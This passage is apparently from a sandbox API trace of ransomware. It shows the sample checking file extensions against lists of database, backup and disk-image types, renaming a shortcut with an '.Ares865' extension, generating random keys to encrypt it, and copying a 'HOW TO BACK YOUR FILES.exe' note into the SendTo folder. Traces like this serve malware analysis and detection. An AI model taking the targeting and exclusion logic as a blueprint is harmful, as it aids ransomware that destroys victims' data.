(lpString="fm5") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.694] lstrlenW (lpString="fmp") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.694] lstrlenW (lpString="fmp12") returned 5 [0058.694] lstrcmpiW (lpString1="d.lnk", lpString2="fmp12") returned -1 [0058.694] lstrlenW (lpString="fmpsl") returned 5 [0058.694] lstrcmpiW (lpString1="d.lnk", lpString2="fmpsl") returned -1 [0058.694] lstrlenW (lpString="fol") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.694] lstrlenW (lpString="fp3") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.694] lstrlenW (lpString="fp4") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.694] lstrlenW (lpString="fp5") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.694] lstrlenW (lpString="fp7") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.694] lstrlenW (lpString="fpt") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.694] lstrlenW (lpString="frm") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.694] lstrlenW (lpString="gdb") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.694] lstrlenW (lpString="gdb") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.694] lstrlenW (lpString="grdb") returned 4 [0058.694] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.694] lstrlenW (lpString="gwi") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.694] lstrlenW (lpString="hdb") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.694] lstrlenW (lpString="his") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.694] lstrlenW (lpString="ib") returned 2 [0058.694] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.694] lstrlenW (lpString="idb") returned 3 [0058.694] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.695] lstrlenW (lpString="ihx") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.695] lstrlenW (lpString="itdb") returned 4 [0058.695] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.695] lstrlenW (lpString="itw") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.695] lstrlenW (lpString="jet") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.695] lstrlenW (lpString="jtx") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.695] lstrlenW (lpString="kdb") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.695] lstrlenW (lpString="kexi") returned 4 [0058.695] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.695] lstrlenW (lpString="kexic") returned 5 [0058.695] lstrcmpiW (lpString1="d.lnk", lpString2="kexic") returned -1 [0058.695] lstrlenW (lpString="kexis") returned 5 [0058.695] lstrcmpiW (lpString1="d.lnk", lpString2="kexis") returned -1 [0058.695] lstrlenW (lpString="lgc") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.695] lstrlenW (lpString="lwx") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.695] lstrlenW (lpString="maf") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.695] lstrlenW (lpString="maq") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.695] lstrlenW (lpString="mar") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.695] lstrlenW (lpString="marshal") returned 7 [0058.695] lstrcmpiW (lpString1="ard.lnk", lpString2="marshal") returned -1 [0058.695] lstrlenW (lpString="mas") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.695] lstrlenW (lpString="mav") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.695] lstrlenW (lpString="maw") returned 3 [0058.695] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.695] lstrlenW (lpString="mdbhtml") returned 7 [0058.695] lstrcmpiW (lpString1="ard.lnk", lpString2="mdbhtml") returned -1 [0058.696] lstrlenW (lpString="mdn") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.696] lstrlenW (lpString="mdt") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.696] lstrlenW (lpString="mfd") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.696] lstrlenW (lpString="mpd") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.696] lstrlenW (lpString="mrg") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.696] lstrlenW (lpString="mud") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.696] lstrlenW (lpString="mwb") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.696] lstrlenW (lpString="myd") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.696] lstrlenW (lpString="ndf") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.696] lstrlenW (lpString="nnt") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.696] lstrlenW (lpString="nrmlib") returned 6 [0058.696] lstrcmpiW (lpString1="rd.lnk", lpString2="nrmlib") returned 1 [0058.696] lstrlenW (lpString="ns2") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.696] lstrlenW (lpString="ns3") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.696] lstrlenW (lpString="ns4") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.696] lstrlenW (lpString="nsf") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.696] lstrlenW (lpString="nv") returned 2 [0058.696] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.696] lstrlenW (lpString="nv2") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.696] lstrlenW (lpString="nwdb") returned 4 [0058.696] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.696] lstrlenW (lpString="nyf") returned 3 [0058.696] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.696] lstrlenW (lpString="odb") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.697] lstrlenW (lpString="odb") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.697] lstrlenW (lpString="oqy") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.697] lstrlenW (lpString="ora") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.697] lstrlenW (lpString="orx") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.697] lstrlenW (lpString="owc") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.697] lstrlenW (lpString="p96") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.697] lstrlenW (lpString="p97") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.697] lstrlenW (lpString="pan") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.697] lstrlenW (lpString="pdb") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.697] lstrlenW (lpString="pdm") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.697] lstrlenW (lpString="pnz") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.697] lstrlenW (lpString="qry") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.697] lstrlenW (lpString="qvd") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.697] lstrlenW (lpString="rbf") returned 3 [0058.697] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.697] lstrlenW (lpString="rctd") returned 4 [0058.697] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.697] lstrlenW (lpString="rod") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.698] lstrlenW (lpString="rodx") returned 4 [0058.698] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.698] lstrlenW (lpString="rpd") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.698] lstrlenW (lpString="rsd") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.698] lstrlenW (lpString="sas7bdat") returned 8 [0058.698] lstrcmpiW (lpString1="oard.lnk", lpString2="sas7bdat") returned -1 [0058.698] lstrlenW (lpString="sbf") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.698] lstrlenW (lpString="scx") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.698] lstrlenW (lpString="sdb") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.698] lstrlenW (lpString="sdc") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.698] lstrlenW (lpString="sdf") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.698] lstrlenW (lpString="sis") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.698] lstrlenW (lpString="spq") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.698] lstrlenW (lpString="te") returned 2 [0058.698] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.698] lstrlenW (lpString="teacher") returned 7 [0058.698] lstrcmpiW (lpString1="ard.lnk", lpString2="teacher") returned -1 [0058.698] lstrlenW (lpString="tmd") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.698] lstrlenW (lpString="tps") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.698] lstrlenW (lpString="trc") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.698] lstrlenW (lpString="trc") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.698] lstrlenW (lpString="trm") returned 3 [0058.698] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.698] lstrlenW (lpString="udb") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.699] lstrlenW (lpString="udl") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.699] lstrlenW (lpString="usr") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.699] lstrlenW (lpString="v12") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.699] lstrlenW (lpString="vis") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.699] lstrlenW (lpString="vpd") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.699] lstrlenW (lpString="vvv") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.699] lstrlenW (lpString="wdb") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.699] lstrlenW (lpString="wmdb") returned 4 [0058.699] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.699] lstrlenW (lpString="wrk") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.699] lstrlenW (lpString="xdb") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.699] lstrlenW (lpString="xld") returned 3 [0058.699] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.699] lstrlenW (lpString="xmlff") returned 5 [0058.699] lstrcmpiW (lpString1="d.lnk", lpString2="xmlff") returned -1 [0058.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865") returned 98 [0058.699] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.ares865"), dwFlags=0x1) returned 1 [0058.700] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.700] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1250) returned 1 [0058.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.700] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.701] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.701] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.701] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x120 [0058.703] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0058.706] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.707] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.707] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.707] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.708] CloseHandle (hObject=0x120) returned 1 [0058.708] CloseHandle (hObject=0x15c) returned 1 [0058.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.709] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9f649f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0058.709] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0058.709] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0058.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\SendTo", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\SendTo") returned="C:\\Users\\Default User\\SendTo" [0058.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6510 | out: hHeap=0x2b0000) returned 1 [0058.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0058.709] lstrlenW (lpString="C:\\Users\\Default User\\SendTo") returned 28 [0058.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\SendTo" | out: lpString1="C:\\Users\\Default User\\SendTo") returned="C:\\Users\\Default User\\SendTo" [0058.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.710] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\SendTo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\sendto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.710] GetLastError () returned 0x20 [0058.710] Sleep (dwMilliseconds=0xc8) [0058.902] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0058.902] GetLastError () returned 0x0 [0058.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.902] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.902] CloseHandle (hObject=0x120) returned 1 [0058.902] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.902] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.902] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\SendTo\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.903] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.903] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.903] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.903] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.903] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.903] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.903] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.903] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.903] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeca9f1ef, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="aoldtz.exe") returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".") returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="..") returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="windows") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="bootmgr") returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="temp") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="pagefile.sys") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="boot") returned 1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ids.txt") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ntuser.dat") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="perflogs") returned -1 [0058.903] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="MSBuild") returned -1 [0058.903] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0058.903] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\*") returned 30 [0058.903] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Compressed (zipped) Folder.ZFSendToTarget" | out: lpString1="Compressed (zipped) Folder.ZFSendToTarget") returned="Compressed (zipped) Folder.ZFSendToTarget" [0058.903] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0058.904] lstrlenW (lpString="Ares865") returned 7 [0058.904] lstrcmpiW (lpString1="oTarget", lpString2="Ares865") returned 1 [0058.904] lstrlenW (lpString=".dll") returned 4 [0058.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".dll") returned 1 [0058.904] lstrlenW (lpString=".lnk") returned 4 [0058.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".lnk") returned 1 [0058.904] lstrlenW (lpString=".ini") returned 4 [0058.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".ini") returned 1 [0058.904] lstrlenW (lpString=".sys") returned 4 [0058.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".sys") returned 1 [0058.904] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0058.904] lstrlenW (lpString="bak") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="bak") returned 1 [0058.904] lstrlenW (lpString="ba_") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="ba_") returned 1 [0058.904] lstrlenW (lpString="dbb") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="dbb") returned 1 [0058.904] lstrlenW (lpString="vmdk") returned 4 [0058.904] lstrcmpiW (lpString1="rget", lpString2="vmdk") returned -1 [0058.904] lstrlenW (lpString="rar") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="rar") returned -1 [0058.904] lstrlenW (lpString="zip") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="zip") returned -1 [0058.904] lstrlenW (lpString="tgz") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="tgz") returned -1 [0058.904] lstrlenW (lpString="vbox") returned 4 [0058.904] lstrcmpiW (lpString1="rget", lpString2="vbox") returned -1 [0058.904] lstrlenW (lpString="vdi") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="vdi") returned -1 [0058.904] lstrlenW (lpString="vhd") returned 3 [0058.904] lstrcmpiW (lpString1="get", lpString2="vhd") returned -1 [0058.904] lstrlenW (lpString="vhdx") returned 4 [0058.904] lstrcmpiW (lpString1="rget", lpString2="vhdx") returned -1 [0058.904] lstrlenW (lpString="avhd") returned 4 [0058.904] lstrcmpiW (lpString1="rget", lpString2="avhd") returned 1 [0058.904] lstrlenW (lpString="db") returned 2 [0058.904] lstrcmpiW (lpString1="et", lpString2="db") returned 1 [0058.904] lstrlenW (lpString="db2") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="db2") returned 1 [0058.905] lstrlenW (lpString="db3") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="db3") returned 1 [0058.905] lstrlenW (lpString="dbf") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="dbf") returned 1 [0058.905] lstrlenW (lpString="mdf") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="mdf") returned -1 [0058.905] lstrlenW (lpString="mdb") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="mdb") returned -1 [0058.905] lstrlenW (lpString="sql") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="sql") returned -1 [0058.905] lstrlenW (lpString="sqlite") returned 6 [0058.905] lstrcmpiW (lpString1="Target", lpString2="sqlite") returned 1 [0058.905] lstrlenW (lpString="sqlite3") returned 7 [0058.905] lstrcmpiW (lpString1="oTarget", lpString2="sqlite3") returned -1 [0058.905] lstrlenW 